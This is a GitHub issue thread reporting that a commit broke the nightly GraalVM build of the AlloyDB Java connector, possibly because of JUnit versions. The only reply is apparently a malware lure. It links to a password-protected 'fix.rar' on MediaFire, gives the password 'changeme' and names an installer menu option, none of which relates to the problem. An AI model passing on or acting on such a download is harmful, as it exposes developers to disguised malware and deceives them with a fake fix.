### ISSUE TITLE
Fix broken nightly GraalVM build

### ISSUE THREAD

**Issue by enocom** [GoogleCloudPlatform/alloydb-java-connector#574]
It appears this commit broke our nightly build:

https://github.com/GoogleCloudPlatform/alloydb-java-connector/commit/6087fe66a02ec0d7defac7f3c980249d81b7a610

It seems the JUnit versions are causing the problem.

**Comment by MinecraftEarthVillage** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
